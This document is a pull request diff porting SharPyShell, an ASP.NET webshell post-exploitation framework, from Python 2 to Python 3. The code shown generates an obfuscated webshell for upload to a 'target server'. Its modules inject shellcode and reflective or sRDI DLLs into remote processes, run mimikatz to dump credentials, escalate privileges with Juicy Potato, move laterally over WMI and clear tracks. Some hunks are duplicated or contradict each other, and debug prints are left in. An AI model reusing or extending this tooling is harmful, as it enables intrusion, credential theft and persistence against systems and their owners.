### PR TITLE
Python 3 conversion 

### DIFF
--- a/SharPyShell.py
+++ b/SharPyShell.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python2
+#!/usr/bin/env python3
 
 from core.Generate import Generate
 from core.SharPyShellPrompt import SharPyShellPrompt
@@ -144,7 +144,7 @@ def create_interact_parser(subparsers):
 
 
 if __name__ == '__main__':
-    print config.banner
+    print (config.banner)
     parser = argparse.ArgumentParser(prog='SharPyShell', formatter_class=argparse.RawTextHelpFormatter,
                                      epilog=example_text_main)
     parser.add_argument('--version', action='version', version=config.header)

--- a/core/ChannelAES.py
+++ b/core/ChannelAES.py
@@ -8,7 +8,7 @@ class ChannelAES(Singleton):
     BS = 16
 
     def __init__(self, password):
-        self.hashed_password = password.decode('hex')
+        self.hashed_password = bytes.fromhex(password)
         self.IV = self.hashed_password[0:self.BS]
 
     def encrypt(self, plain_data):
@@ -22,4 +22,4 @@ class ChannelAES(Singleton):
         aes = AES.new(self.hashed_password, AES.MODE_CBC, self.IV)
         unpad = lambda s: s[:-ord(s[len(s) - 1:])]
         decrypted_data = aes.decrypt(encrypted_data)
-        return unpad(decrypted_data)
+        return unpad(decrypted_data).decode()

--- a/core/ChannelXOR.py
+++ b/core/ChannelXOR.py
@@ -10,7 +10,7 @@ class ChannelXOR(Singleton):
     def encrypt(self, plain_data):
         key = self.password
         xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in list(zip(plain_data, cycle(key))))
-        return xored
+        return bytes(xored, 'utf-8')
 
     def decrypt(self, encrypted_data):
-        return str(self.encrypt(encrypted_data.decode('utf-8')))
+        return self.encrypt(encrypted_data.decode('utf-8')).decode()

--- a/core/ChannelXOR.py
+++ b/core/ChannelXOR.py
@@ -1,17 +1,16 @@
 from utils.Singleton import Singleton
-
+from itertools import cycle
 
 class ChannelXOR(Singleton):
     password = None
 
     def __init__(self, password):
-        self.password = password.encode('utf-8')
+        self.password = password
 
     def encrypt(self, plain_data):
         key = self.password
-        from itertools import izip, cycle
-        xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(plain_data, cycle(key)))
-        return bytearray(xored)
+        xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in list(zip(plain_data, cycle(key))))
+        return xored
 
     def decrypt(self, encrypted_data):
-        return self.encrypt(encrypted_data)
+        return str(self.encrypt(encrypted_data.decode('utf-8')))

--- a/core/Environment.py
+++ b/core/Environment.py
@@ -7,7 +7,7 @@ class GetTempDirectory(Module):
 
     _exception_class = GetTempDirectoryException
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 public class SharPyShell
                 {                    
@@ -45,7 +45,7 @@ class GetEnvDirectory(Module):
 
     _exception_class = GetEnvDirectoryException
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 using System.Security.AccessControl;using System.Security.Principal;
                 
@@ -101,7 +101,7 @@ class ClearDirectories(Module):
 
     _exception_class = ClearDirectoriesException
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 public class SharPyShell
                 {                    
@@ -198,7 +198,7 @@ class Environment:
         excluded_path = ['env_directory', 'working_directory']
         modules_path = ['@"' + v + '"' for k, v in env_settings.items() if k not in excluded_path]
         modules_path_string_array = '{' + ','.join(modules_path) + '}'
-        print '\nRemoving tracks....\n'
+        print ('\nRemoving tracks....\n')
         result = self.clear_dir_obj.run([modules_path_string_array, env_directory])
         if '{{{ClearDirectoriesException}}}' not in result:
             result = format_output(result)

--- a/core/Generate.py
+++ b/core/Generate.py
@@ -1,8 +1,9 @@
 from core import config
 from struct import unpack
+from itertools import cycle
 import hashlib
 import random
-
+import io
 
 class Generate():
 
@@ -16,6 +17,7 @@ class Generate():
     __output_path = config.output_path + 'sharpyshell.aspx'
 
     def __init__(self, password, encryption, obfuscator, endian_type, output):
+        password = password.encode('utf-8')
         if encryption == 'aes128':
             self.__password = hashlib.md5(password).hexdigest()
         else:
@@ -41,11 +43,12 @@ class Generate():
 
     def __generate_webshell_code_encrypted_dll(self, template_code):
         def xor_file(path, key):
-            with open(path, 'rb') as file_handle:
+            with io.open(path, mode='rb') as file_handle:
                 plain_data = file_handle.read()
-            from itertools import izip, cycle
-            xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(plain_data, cycle(key)))
-            return bytearray(xored)
+            xored = []        
+            for (x, y) in list(zip(plain_data, cycle(key))):
+                xored.append(hex(x ^ ord(y)))
+            return '{' + ",".join(xored) + '}'
 
         def generate_byte_file_string(byte_arr):
             output = [str(hex(byte)) for byte in byte_arr]
@@ -57,9 +60,8 @@ class Generate():
             dll_name = 'runtime_compiler_xor.dll'
         runtime_compiler_dll_path = self.__runtime_compiler_path + dll_name
         obfuscated_dll = xor_file(runtime_compiler_dll_path, self.__password)
-        obfuscated_dll_string = generate_byte_file_string(obfuscated_dll)
         webshell_code = template_code.replace('{{SharPyShell_Placeholder_pwd}}', self.__password)
-        webshell_code = webshell_code.replace('{{SharPyShell_Placeholder_enc_dll}}', obfuscated_dll_string)
+        webshell_code = webshell_code.replace('{{SharPyShell_Placeholder_enc_dll}}', obfuscated_dll)
         return webshell_code
 
     def __generate_webshell_code_ulong_compression(self, template_code):
@@ -109,5 +111,5 @@ class Generate():
         webshell_output_path = self.__output_path
         with open(webshell_output_path, 'w') as file_handle:
             file_handle.write(webshell_code)
-        print 'SharPyShell webshell written correctly to: ' + webshell_output_path
-        print '\nUpload it to the target server and let\'s start having some fun :) \n\n'
+        print ('SharPyShell webshell written correctly to: ' + webshell_output_path)
+        print ('\nUpload it to the target server and let\'s start having some fun :) \n\n')

--- a/core/Generate.py
+++ b/core/Generate.py
@@ -50,10 +50,6 @@ class Generate():
                 xored.append(hex(x ^ ord(y)))
             return '{' + ",".join(xored) + '}'
 
-        def generate_byte_file_string(byte_arr):
-            output = [str(hex(byte)) for byte in byte_arr]
-            return '{' + ",".join(output) + '}'
-
         if 'aes' in self.__encryption:
             dll_name = 'runtime_compiler_aes.dll'
         else:

--- a/core/Generate.py
+++ b/core/Generate.py
@@ -50,10 +50,6 @@ class Generate():
                 xored.append(hex(x ^ ord(y)))
             return '{' + ",".join(xored) + '}'
 
-        def generate_byte_file_string(byte_arr):
-            output = [str(hex(byte)) for byte in byte_arr]
-            return '{' + ",".join(output) + '}'
-
         if 'aes' in self.__encryption:
             dll_name = 'runtime_compiler_aes.dll'
         else:
@@ -66,7 +62,7 @@ class Generate():
 
     def __generate_webshell_code_ulong_compression(self, template_code):
         def get_dll_code(dll_code_path):
-            with open(dll_code_path, 'r') as file_handle:
+            with open(dll_code_path, 'rb') as file_handle:
                 dll_code = file_handle.read()
             return dll_code
 

--- a/core/Generate.py
+++ b/core/Generate.py
@@ -50,6 +50,10 @@ class Generate():
                 xored.append(hex(x ^ ord(y)))
             return '{' + ",".join(xored) + '}'
 
+        def generate_byte_file_string(byte_arr):
+            output = [str(hex(byte)) for byte in byte_arr]
+            return '{' + ",".join(output) + '}'
+
         if 'aes' in self.__encryption:
             dll_name = 'runtime_compiler_aes.dll'
         else:

--- a/core/Module.py
+++ b/core/Module.py
@@ -57,14 +57,14 @@ class Module(Singleton):
 
     def _encrypt_request(self, request_clear):
         request_encrypted = self._channel_enc_obj.encrypt(request_clear)
-        request_encrypted_encoded = base64.b64encode(bytes(request_encrypted, 'utf-8'))
+        request_encrypted_encoded = base64.b64encode(request_encrypted)
         return request_encrypted_encoded
 
     def _post_request(self, request_encrypted_encoded):
         response_status_code, response_headers, response_text = \
             self._request_object.send_request(request_encrypted_encoded)
         if response_status_code != 200:
-            raise self._exception_class('{{{' + self._exception_class.__name__ + '}}}\n' +
+            raise self._exception_class('{{{' + str(self._exception_class.__name__) + '}}}\n' +
                                         str(response_headers) + '\n\n' +
                                         str(response_text))
         return response_text

--- a/core/Module.py
+++ b/core/Module.py
@@ -20,7 +20,7 @@ class Module(Singleton):
         """
     '''runtime_code must have the class name "SharPyShell" and the main function name "ExecRuntime". The ExecRuntime 
        function will be the code run on the server and it must return results in byte[] type '''
-    _runtime_code = ur"""
+    _runtime_code = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 public class SharPyShell
                 {                    
@@ -57,7 +57,7 @@ class Module(Singleton):
 
     def _encrypt_request(self, request_clear):
         request_encrypted = self._channel_enc_obj.encrypt(request_clear)
-        request_encrypted_encoded = base64.b64encode(request_encrypted)
+        request_encrypted_encoded = base64.b64encode(bytes(request_encrypted, 'utf-8'))
         return request_encrypted_encoded
 
     def _post_request(self, request_encrypted_encoded):
@@ -66,7 +66,7 @@ class Module(Singleton):
         if response_status_code != 200:
             raise self._exception_class('{{{' + self._exception_class.__name__ + '}}}\n' +
                                         str(response_headers) + '\n\n' +
-                                        response_text)
+                                        str(response_text))
         return response_text
 
     def _decrypt_response(self, encrypted_response_encoded):

--- a/core/Request.py
+++ b/core/Request.py
@@ -1,4 +1,5 @@
 from utils.Singleton import Singleton
+from utils.Singleton import Singleton
 import ssl
 import urllib3
 from urllib3.contrib.socks import SOCKSProxyManager

--- a/core/SharPyShellPrompt.py
+++ b/core/SharPyShellPrompt.py
@@ -1,8 +1,9 @@
-import config
+from core import config
 from cmd import Cmd
 import os
 import glob
 import sys
+import importlib
 import shlex
 import hashlib
 import signal
@@ -28,8 +29,9 @@ class SharPyShellPrompt(Cmd):
 
     def __init__(self, password, channel_enc_mode, default_shell, url, user_agent,
                  cookies, custom_headers, insecure_ssl, proxy):
-        reload(sys)
-        sys.setdefaultencoding('utf8')
+        importlib.reload(sys)
+        #sys.setdefaultencoding('utf8')
+        password = password.encode('utf-8')
         signal.signal(signal.SIGTSTP, lambda s, f: self.do_quit())
         Cmd.__init__(self)
         if channel_enc_mode == 'aes128':
@@ -80,7 +82,7 @@ class SharPyShellPrompt(Cmd):
             return self.emptyline()
         if cmd.startswith('#'):
             response = self.onecmd_custom(cmd.lstrip('#'), args)
-            print response
+            print (response)
             return response
         if cmd in self.helper_commands:
             func = getattr(self, 'do_' + cmd.lstrip('#'))
@@ -113,7 +115,7 @@ class SharPyShellPrompt(Cmd):
         """Change the current working directory."""
         working_directory = self.modules_settings['working_directory']
         if arg == "" or arg == " " or arg == '.':
-            print working_directory
+            print (working_directory)
             return
         if arg == '..':
             arg = working_directory.split('\\')
@@ -127,7 +129,7 @@ class SharPyShellPrompt(Cmd):
             elif len(arg) > 0:
                 arg = '\\'.join(arg)
             else:
-                print "Empty Path."
+                print ("Empty Path.")
                 return
         else:
             if '/' in arg:
@@ -143,25 +145,25 @@ class SharPyShellPrompt(Cmd):
         if '{{{SharPyShellError}}}' not in response:
             self.modules_settings['working_directory'] = arg
         else:
-            print response
+            print (response)
         return response
 
     def do_help(self, arg):
         """List available commands."""
         if arg and arg.lstrip('#') in self.modules_loaded_tree:
-            print self.modules_loaded[arg.lstrip('#')].complete_help
+            print (self.modules_loaded[arg.lstrip('#')].complete_help)
         else:
-            print "\n\n" + self.doc_header + "\n"
+            print ("\n\n" + self.doc_header + "\n")
             data = [['\nCommands\n', '\nDesc\n']]
             for module_name in sorted(self.modules_loaded_tree):
                 data.append(['#%s' % module_name, self.modules_loaded[module_name].short_help])
-            print prettify.tablify(data, table_border=False)
+            print (prettify.tablify(data, table_border=False))
             print
-            print "\n" + "SharPyShell Helper Commands:" + "\n"
+            print ("\n" + "SharPyShell Helper Commands:" + "\n")
             data = [['\nCommands\n', '\nDesc\n']]
             for module_name in sorted(self.helper_commands):
                 data.append(['%s' % module_name, getattr(self, 'do_'+module_name).__doc__])
-            print prettify.tablify(data, table_border=False)
+            print (prettify.tablify(data, table_border=False))
             print
 
     def complete_help(self, text, line, start_index, end_index):
@@ -217,10 +219,10 @@ class SharPyShellPrompt(Cmd):
             return
         # Clean trailing newline if existent to prettify output
         result = result[:-1] if (
-                isinstance(result, basestring) and
+                isinstance(result, str) and
                 result.endswith('\n')
         ) else result
-        print result
+        print (result)
 
     def cmdloop(self, intro=None):
         """Repeatedly issue a prompt, accept input, parse an initial prefix
@@ -251,7 +253,7 @@ class SharPyShellPrompt(Cmd):
                     else:
                         if self.use_rawinput:
                             try:
-                                line = raw_input(self.prompt)
+                                line = input(self.prompt)
                             except EOFError:
                                 line = 'EOF'
                         else:
@@ -279,10 +281,10 @@ class SharPyShellPrompt(Cmd):
     def do_quit(self, args=[]):
         """Quit the program."""
         if self.online:
-            print "\n\nQuitting...\n"
-            print self.env_obj.clear_env(self.modules_settings)
+            print ("\n\nQuitting...\n")
+            print (self.env_obj.clear_env(self.modules_settings))
         else:
-            print args[0] + "\n\n\nTarget Offline...\n"
+            print (args[0] + "\n\n\nTarget Offline...\n")
         raise SystemExit
 
     def do_exit(self, args=[]):

--- a/modules/download.py
+++ b/modules/download.py
@@ -111,12 +111,10 @@ class Download(Module):
         return output_file_size
 
     def __write_local_file(self, file_content, output_path, split=False):
-        print(type(file_content))
         if split:
             file_open_mode = 'ab'
         else:
             file_open_mode = 'wb'
-        print(file_open_mode)
         with open(output_path, file_open_mode) as outfile:
             outfile.write(bytes(file_content, "utf-8"))
         output = "File Downloaded correctly to " + output_path

--- a/modules/download.py
+++ b/modules/download.py
@@ -36,7 +36,7 @@ class Download(Module):
                 #download C:\windows\system32\cmd.exe /home/user/cmd.exe 1024
     """
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
             using System;using System.IO;using System.Diagnostics;using System.Text;
             public class SharPyShell{                    
                 public byte[] Download(string arg){
@@ -56,7 +56,7 @@ class Download(Module):
             }
     """
 
-    __runtime_code_split_file = ur"""
+    __runtime_code_split_file = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 public class SharPyShell{                    
                     public byte[] Download(string arg, int chunk, int offset){
@@ -79,7 +79,7 @@ class Download(Module):
                 }
         """
 
-    __runtime_code_get_file_size = ur"""
+    __runtime_code_get_file_size = r"""
             using System;using System.IO;using System.Diagnostics;using System.Text;
             public class SharPyShell{                    
                 string GetFileSize(string path){
@@ -111,12 +111,14 @@ class Download(Module):
         return output_file_size
 
     def __write_local_file(self, file_content, output_path, split=False):
+        print(type(file_content))
         if split:
             file_open_mode = 'ab'
         else:
             file_open_mode = 'wb'
+        print(file_open_mode)
         with open(output_path, file_open_mode) as outfile:
-            outfile.write(file_content)
+            outfile.write(bytes(file_content, "utf-8"))
         output = "File Downloaded correctly to " + output_path
         return output
 
@@ -166,8 +168,8 @@ class Download(Module):
                 file_content = self._parse_response(decrypted_response)
                 if len(requests) > 1:
                     parsed_response = self.__write_local_file(file_content, download_output_path, split=True)
-                    print 'Chunk ' + str(i + 1) + ' --> ' + str(chunk_size * i) + ' - ' +\
-                          str(chunk_size * i + chunk_size) + ' bytes written correctly to ' + download_output_path
+                    print ('Chunk ' + str(i + 1) + ' --> ' + str(chunk_size * i) + ' - ' +\
+                          str(chunk_size * i + chunk_size) + ' bytes written correctly to ' + download_output_path)
                 else:
                     parsed_response = self.__write_local_file(file_content, download_output_path)
         except ModuleException as module_exc:

--- a/modules/download.py
+++ b/modules/download.py
@@ -111,10 +111,12 @@ class Download(Module):
         return output_file_size
 
     def __write_local_file(self, file_content, output_path, split=False):
+        print(type(file_content))
         if split:
             file_open_mode = 'ab'
         else:
             file_open_mode = 'wb'
+        print(file_open_mode)
         with open(output_path, file_open_mode) as outfile:
             outfile.write(bytes(file_content, "utf-8"))
         output = "File Downloaded correctly to " + output_path

--- a/modules/exec_cmd.py
+++ b/modules/exec_cmd.py
@@ -30,7 +30,7 @@ class Exec_cmd(Module):
                 #exec_cmd echo test > C:\Windows\Temp\test.txt
     """
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 public class SharPyShell
                 {                    

--- a/modules/exec_ps.py
+++ b/modules/exec_ps.py
@@ -32,7 +32,7 @@ class Exec_ps(Module):
 
         """
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                     using System;using System.IO;using System.Diagnostics;using System.Text;
                     public class SharPyShell
                     {                    
@@ -80,7 +80,7 @@ class Exec_ps(Module):
         if '""' in cmd:
             cmd = cmd.replace('""', '"')
         cmd = '$ProgressPreference = "SilentlyContinue";' + cmd
-        cmd = b64encode(cmd.encode('UTF-16LE'))
+        cmd = str(b64encode(cmd.encode('UTF-16LE')), 'UTF-8')
         working_path = self._module_settings['working_directory']
         return self._runtime_code % (cmd, working_path)
 

--- a/modules/inject_dll_reflective.py
+++ b/modules/inject_dll_reflective.py
@@ -52,7 +52,7 @@ class Inject_dll_reflective(Inject_shellcode):
     def __get_reflective_loader_offset(self, dll_path):
         pe_parser = pefile.PE(dll_path)
         for exported_function in pe_parser.DIRECTORY_ENTRY_EXPORT.symbols:
-            if 'ReflectiveLoader' in exported_function.name:
+            if 'ReflectiveLoader' in str(exported_function.name):
                 reflective_loader_rva = exported_function.address
                 return hex(pe_parser.get_offset_from_rva(reflective_loader_rva))
         raise self._exception_class('The DLL does not contain a reflective loader function.\n')
@@ -63,7 +63,7 @@ class Inject_dll_reflective(Inject_shellcode):
         dll_path = config.modules_paths + 'reflective_dll/' + dll_path
         code_offset = str(self.__get_reflective_loader_offset(dll_path))
         with open(dll_path, 'rb') as file_handle:
-            byte_arr = bytearray(file_handle.read())
+            byte_arr = file_handle.read()
         base64_compressed_dll = gzip_utils.get_compressed_base64_from_binary(byte_arr)
         if injection_type == 'remote_virtual_protect':
             runtime_code = self._runtime_code % (self._runtime_code_virtual_protect, base64_compressed_dll,

--- a/modules/inject_dll_srdi.py
+++ b/modules/inject_dll_srdi.py
@@ -38,14 +38,12 @@ class sRDI:
             functionHash = 0
 
             for b in function:
-                b = ord(b)
                 functionHash = ror(functionHash, 13, 32)
                 functionHash += b
 
             moduleHash = 0
 
             for b in module:
-                b = ord(b)
                 moduleHash = ror(moduleHash, 13, 32)
                 moduleHash += b
 
@@ -57,7 +55,6 @@ class sRDI:
             functionHash = 0
 
             for b in function:
-                b = ord(b)
                 functionHash = ror(functionHash, 13, 32)
                 functionHash += b
 
@@ -145,7 +142,7 @@ class sRDI:
             # RDI shellcode
             # DLL bytes
             # User data
-            return bootstrap + rdiShellcode + dllBytes + userData
+            return bootstrap + rdiShellcode + dllBytes + str.encode(userData, 'utf-16-le')
 
         else:  # 32 bit
             rdiShellcode = rdiShellcode32
@@ -217,7 +214,7 @@ class sRDI:
             # RDI shellcode
             # DLL bytes
             # User data
-            return bootstrap + rdiShellcode + dllBytes + userData
+            return bootstrap + rdiShellcode + dllBytes + str.encode(userData, 'utf-16-le')
 
 
 class Inject_dll_srdi(Inject_shellcode):

--- a/modules/inject_dll_srdi.py
+++ b/modules/inject_dll_srdi.py
@@ -281,7 +281,7 @@ class Inject_dll_srdi(Inject_shellcode):
             thread_parameters, exported_function_name, exported_function_data = self._parse_run_args(args)
         dll_path = config.modules_paths + 'dll/' + dll_path
         with open(dll_path, 'rb') as file_handle:
-            dll_bin_byte_arr = bytearray(file_handle.read())
+            dll_bin_byte_arr = file_handle.read()
         srdi_object = sRDI()
         if exported_function_name != 0x10:
             exported_function_name = srdi_object.HashFunctionName(exported_function_name)

--- a/modules/inject_shellcode.py
+++ b/modules/inject_shellcode.py
@@ -45,7 +45,7 @@ class Inject_shellcode(Module):
                                                 
     """
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                     using System;using System.IO;using System.Diagnostics;using System.Text;
                     using System.Runtime.InteropServices; using System.IO.Compression;
 
@@ -230,7 +230,7 @@ class Inject_shellcode(Module):
                     }   
                     """
 
-    _runtime_code_virtual = ur"""
+    _runtime_code_virtual = r"""
                     IntPtr codeMemAddress = VirtualAllocEx(targetProcessHandle, IntPtr.Zero, codeMemorySize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
                     if(codeMemAddress == (IntPtr)0){
                         output += error_string + "\n\tError allocating code buffer memory.\n\tVirtualAllocEx failed with error code " + Marshal.GetLastWin32Error(); 
@@ -245,7 +245,7 @@ class Inject_shellcode(Module):
                     output += "\n\n\tCode written into remote process. Bytes written: " + bytesWrittenCode.ToString();
     """
 
-    _runtime_code_virtual_protect = ur"""
+    _runtime_code_virtual_protect = r"""
                     uint codeMemSize = codeMemorySize;
                     IntPtr codeMemAddress = VirtualAllocEx(targetProcessHandle, IntPtr.Zero, codeMemorySize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
                     if(codeMemAddress == (IntPtr)0){

--- a/modules/invoke_ps_module.py
+++ b/modules/invoke_ps_module.py
@@ -37,7 +37,7 @@ class Invoke_ps_module(Module):
                 #invoke_ps_module PowerUp.ps1 ';Invoke-AllChecks'
     """
 
-    _ps_code = ur"""
+    _ps_code = r"""
                 $path_in_module="%s";
                 $path_in_app_code="%s";
                 $key=[System.Text.Encoding]::UTF8.GetBytes('%s');
@@ -57,7 +57,7 @@ class Invoke_ps_module(Module):
                 Remove-Item -Path $path_in_app_code -Force 2>&1 | Out-Null;
     """
 
-    _ps_code_no_appended_code = ur"""
+    _ps_code_no_appended_code = r"""
                 $path_in="%s";
                 $key=[System.Text.Encoding]::UTF8.GetBytes('%s');
                 $encrypted=[System.IO.File]::ReadAllBytes($path_in);
@@ -108,7 +108,7 @@ class Invoke_ps_module(Module):
         if '""' in appended_code:
             appended_code = appended_code.replace('""', '"')
         enc_appended_code_path = config.modules_paths + 'ps_modules/' + random_generator()
-        byte_arr_app_module_encrypted = bytearray(appended_code)
+        byte_arr_app_module_encrypted = bytearray(appended_code, 'utf-8')
         self.__xor_bytearray(byte_arr_app_module_encrypted)
         with open(enc_appended_code_path, 'wb') as file_handle:
             file_handle.write(byte_arr_app_module_encrypted)
@@ -127,12 +127,12 @@ class Invoke_ps_module(Module):
             encrypted_module_path = self._module_settings[ps_module]
         else:
             local_encrypted_module_path = self._gen_encrypted_module(ps_module)
-            print '\n\n\nUploading encrypted ps module....\n'
+            print ('\n\n\nUploading encrypted ps module....\n')
             try:
                 encrypted_module_path = self._module_settings['env_directory'] + '\\' + random_generator()
                 upload_response = self._parse_response(self.upload_module_object.run([local_encrypted_module_path,
                                                                                       encrypted_module_path]))
-                print upload_response
+                print (upload_response)
                 self._module_settings[ps_module] = encrypted_module_path
             except Exception as exc:
                 raise self._exception_class(str(exc))

--- a/modules/lateral_wmi.py
+++ b/modules/lateral_wmi.py
@@ -61,7 +61,7 @@ class Lateral_wmi(Module):
 
     """
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                     using System;using System.IO;using System.Diagnostics;using System.Text;
                     public class SharPyShell
                     {                    
@@ -104,7 +104,7 @@ class Lateral_wmi(Module):
                     }
                     """
 
-    _runtime_code_runas = ur"""
+    _runtime_code_runas = r"""
                     using System;using System.IO;using System.Diagnostics;using System.Text;
                     using System.Runtime.InteropServices;using System.Security.Principal;using System.Security.Permissions;using System.Security;using Microsoft.Win32.SafeHandles;using System.Runtime.ConstrainedExecution;
 
@@ -283,7 +283,7 @@ class Lateral_wmi(Module):
     __default_local_user = ''
     __default_local_password = ''
     __default_local_domain = ''
-    __wmi_code_arguments = ur'/node:%s /user:""%s"" /password:""%s"" process call create ""cmd.exe /c %s""'
+    __wmi_code_arguments = r'/node:%s /user:""%s"" /password:""%s"" process call create ""cmd.exe /c %s""'
 
     def __run_as_current_user(self, wmi_code_arguments):
         request = self._create_request([wmi_code_arguments, 'current_user'])

--- a/modules/mimikatz.py
+++ b/modules/mimikatz.py
@@ -126,7 +126,7 @@ class Mimikatz(Module):
         dll_name = 'powerkatz.dll'
         exported_function_name = 'powershell_reflective_mimikatz'
         log_file = self._module_settings['env_directory'] + '\\' + random_generator()
-        exported_function_data = str(('"log ' + log_file + '" ' + custom_command + '\x00').encode('utf-16-le'))
+        exported_function_data = '"log ' + log_file + '" ' + custom_command
         if username == '':
             print ('\n\nInjecting converted DLL shellcode into remote process...')
             response = self.inject_dll_srdi_module_object.run([dll_name, 'remote_virtual', 'cmd.exe', '60000', '{}',

--- a/modules/mimikatz.py
+++ b/modules/mimikatz.py
@@ -106,9 +106,9 @@ class Mimikatz(Module):
         else:
             exe_path = config.modules_paths + 'exe_modules/mimikatz.exe'
             remote_upload_path = self._module_settings['env_directory'] + '\\' + random_generator() + '.exe'
-            print '\n\n\nUploading mimikatz binary....\n'
+            print ('\n\n\nUploading mimikatz binary....\n')
             upload_response = self._parse_response(self.upload_module_object.run([exe_path, remote_upload_path]))
-            print upload_response
+            print (upload_response)
             self._module_settings['mimikatz.exe'] = remote_upload_path
             bin_path = remote_upload_path
         return bin_path
@@ -128,7 +128,7 @@ class Mimikatz(Module):
         log_file = self._module_settings['env_directory'] + '\\' + random_generator()
         exported_function_data = str(('"log ' + log_file + '" ' + custom_command + '\x00').encode('utf-16-le'))
         if username == '':
-            print '\n\nInjecting converted DLL shellcode into remote process...'
+            print ('\n\nInjecting converted DLL shellcode into remote process...')
             response = self.inject_dll_srdi_module_object.run([dll_name, 'remote_virtual', 'cmd.exe', '60000', '{}',
                                                                    exported_function_name, exported_function_data])
             response = self._parse_response(response)

--- a/modules/privesc_juicy_potato.py
+++ b/modules/privesc_juicy_potato.py
@@ -56,7 +56,7 @@ class Privesc_juicy_potato(Module):
                 #privesc_juicy_potato 'whoami > C:\windows\temp\whoami_juicy.txt' 'exe'
     """
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                    using System;using System.IO;using System.Diagnostics;using System.Text;
                    public class SharPyShell
                    {                    
@@ -130,9 +130,9 @@ class Privesc_juicy_potato(Module):
         else:
             exe_path = config.modules_paths + 'exe_modules/JuicyPotato.exe'
             remote_upload_path = self._module_settings['env_directory'] + '\\' + random_generator() + '.exe'
-            print '\n\n\nUploading Juicy Potato binary....\n'
+            print ('\n\n\nUploading Juicy Potato binary....\n')
             upload_response = self._parse_response(self.upload_module_object.run([exe_path, remote_upload_path]))
-            print upload_response
+            print (upload_response)
             self._module_settings['JuicyPotato.exe'] = remote_upload_path
             bin_path = remote_upload_path
         return bin_path
@@ -171,7 +171,7 @@ class Privesc_juicy_potato(Module):
         configuration += ListeningAddress + '\00'
         configuration += str(len(shellcode_bytes)) + '\00'
         configuration += shellcode_bytes
-        configuration_bytes_csharp = '{' + ",".join('0x{:02x}'.format(x) for x in bytearray(configuration)) + '}'
+        configuration_bytes_csharp = '{' + ",".join('0x{:02x}'.format(x) for x in configuration.encode()) + '}'
         response = self.inject_dll_reflective_module_object.run(['juicypotato_reflective.dll', 'remote_virtual',
                                                                 'cmd.exe', thread_timeout, configuration_bytes_csharp])
         parsed_response = self._parse_response(response)
@@ -189,7 +189,7 @@ class Privesc_juicy_potato(Module):
                 response = self.__run_exe_version(cmd, arguments)
             else:
                 logfile = self._module_settings['env_directory'] + '\\' + random_generator()
-                print '\n\nInjecting Reflective DLL into remote process...'
+                print ('\n\nInjecting Reflective DLL into remote process...')
                 response = self.__run_reflective_dll_version(cmd, custom_shellcode_path, logfile, clsid)
                 response += '\nReflective DLL injection executed!\n\n'
                 if custom_shellcode_path == 'default':

--- a/modules/runas.py
+++ b/modules/runas.py
@@ -34,8 +34,7 @@ class Runas(Module):
             domain                  domain of the user, if in a domain. 
                                     Default: ''
             process_timeout_ms      the waiting time (in ms) to use in the WaitForSingleObject() function.
-                                    This will halt the process until the spawned process ends and sent
-                                    the output back to the webshell.
+                                    This will halt the process until the spawned process ends and sent the output back to the webshell.
                                     If you set 0 an async process will be created and no output will be retrieved.
                                     Default: '60000'
             logon_type              the logon type for the spawned process.
@@ -55,7 +54,7 @@ class Runas(Module):
                                                 
     """
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 using System.Runtime.InteropServices;using System.Security.Principal;using System.Security.Permissions;using System.Security;using Microsoft.Win32.SafeHandles;using System.Runtime.ConstrainedExecution;
 

--- a/modules/runas_ps.py
+++ b/modules/runas_ps.py
@@ -53,7 +53,7 @@ class Runas_ps(Runas):
     def __gen_powershell_launcher(self, ps_code):
         powershell_launcher='powershell -nop -noni -enc '
         ps_code = '$ProgressPreference = "SilentlyContinue";' + ps_code
-        powershell_launcher += b64encode(ps_code.encode('UTF-16LE'))
+        powershell_launcher += str(b64encode(ps_code.encode('UTF-16LE')),'UTF-8')
         return powershell_launcher
 
     def _create_request(self, args):

--- a/modules/upload.py
+++ b/modules/upload.py
@@ -35,7 +35,7 @@ class Upload(Module):
                 #upload /tmp/revshell.exe C:\Users\Public\revshell.exe 1024
     """
 
-    _runtime_code = ur"""
+    _runtime_code = r"""
             using System;using System.IO;using System.Diagnostics;using System.Text;
             public class SharPyShell{                    
                 byte[] Upload(string path, byte[] file_bytes){
@@ -56,7 +56,7 @@ class Upload(Module):
             }
     """
 
-    __runtime_code_split_file = ur"""
+    __runtime_code_split_file = r"""
             using System;using System.IO;using System.Diagnostics;using System.Text;
             public class SharPyShell{                    
                 byte[] Upload(string path, byte[] file_bytes){
@@ -80,7 +80,7 @@ class Upload(Module):
             }
     """
 
-    __runtime_code_init_file = ur"""
+    __runtime_code_init_file = r"""
                 using System;using System.IO;using System.Diagnostics;using System.Text;
                 public class SharPyShell{                    
                     string InitFile(string path){
@@ -164,8 +164,8 @@ class Upload(Module):
                 decrypted_response = self._decrypt_response(encrypted_response)
                 parsed_response = self._parse_response(decrypted_response)
                 if len(requests) > 1:
-                    print 'Chunk ' + str(i + 1) + ' --> ' + str(chunk_size*i) + ' - ' + str(chunk_size*i+chunk_size) +\
-                          ' bytes written correctly to ' + upload_output_path
+                    print ('Chunk ' + str(i + 1) + ' --> ' + str(chunk_size*i) + ' - ' + str(chunk_size*i+chunk_size) +\
+                          ' bytes written correctly to ' + upload_output_path)
         except ModuleException as module_exc:
